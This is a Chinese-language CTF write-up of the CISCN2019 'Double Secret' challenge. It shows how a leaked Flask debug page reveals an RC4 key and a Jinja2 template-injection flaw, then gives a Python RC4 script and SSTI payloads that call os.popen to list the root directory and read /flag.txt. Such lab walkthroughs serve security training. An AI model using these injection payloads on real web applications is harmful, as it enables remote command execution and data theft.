[CISCN2019 华东南赛区]Double Secret
一.前言
这波属于是忙里偷闲了,面对着几篇大作业却没有任何思绪的我,默默打开了BUU的靶场,开始了我的“偷闲”之旅(doge。可能是最近临近期末的缘故,各个老师的作业数量都开始发力了。上个学期还都是1000字,1500字,最多也就3000字,这学期倒好上来直接8000大作业,直接给我干蒙了。算了,废话不多说了直接看题吧。
二.正文
首先,老样子先截一个“案发现场”的图
经典的没有前端界面,他让我们来找secret,所以我们去访问一下secret目录。
emm,我们用get方法把secret传进去看看。
可以看到和前面的那个页面说的一样,他将我们的secret加密之后会先到这里了,然后就在我尝试让它加密其他字符,企图找到一些加密的规律的时候,这个页面报了个错。
我们这是flask开启debug模式之后的结果,我们往下找找,发现了它的部分源码。
它是通过RC4加密算法进行加密的,然后密钥是HereIsTreasure
。而且我们看到了SSTI标志性的render_template_string
,说明这里是存在模板注入的。那么我们如何进行注入呢?RC4是对称加密的,所以我们只需要把我们的字符串在传进去之前事先加密过一遍之后,他传进去,再经历过一次加密就会变成自己原来的样子。
接下来就是用RC4加密脚本来加密我们要传入的payload。
脚本连接
import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):
s_box = rc4_init_sbox(key)
crypt = str(rc4_excrypt(message, s_box))
return crypt
def rc4_init_sbox(key):
s_box = list(range(256)) # 我这里没管秘钥小于256的情况,小于256不断重复填充即可
# print("原来的 s 盒:%s" % s_box)
j = 0
for i in range(256):
j = (j + s_box[i] + ord(key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
# print("混乱后的 s 盒:%s"% s_box)
return s_box
def rc4_excrypt(plain, box):
# print("调用加密程序成功。")
res = []
i = j = 0
for s in plain:
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
t = (box[i] + box[j]) % 256
k = box[t]
res.append(chr(ord(s) ^ k))
# print("res用于加密字符串,加密后是:%res" %res)
cipher = "".join(res)
print("加密后的字符串是:%s" %quote(cipher))
#print("加密后的输出(经过编码):")
#print(str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
if __name__ == "__main__":
rc4_main("HereIsTreasure","{{''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].popen('cat /flag.txt').read()}}")
上面脚本里的payload是最终用于读flag用的,下面说一下过程。
我们先用{{''.__class__.__mro__[-1].__subclasses__()[71]
看一下我们是否用的是可以进行命令执行的子类
我们知道这个子类是可以执行命令的,所以我们构造paload列一下根目录。
{{''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].popen('ls /').read()}}
最后我们用上面脚本中的payload拿到flag
三.后记
做完这道题赶快滚去写论文了,后记什么的就先不水了(逃。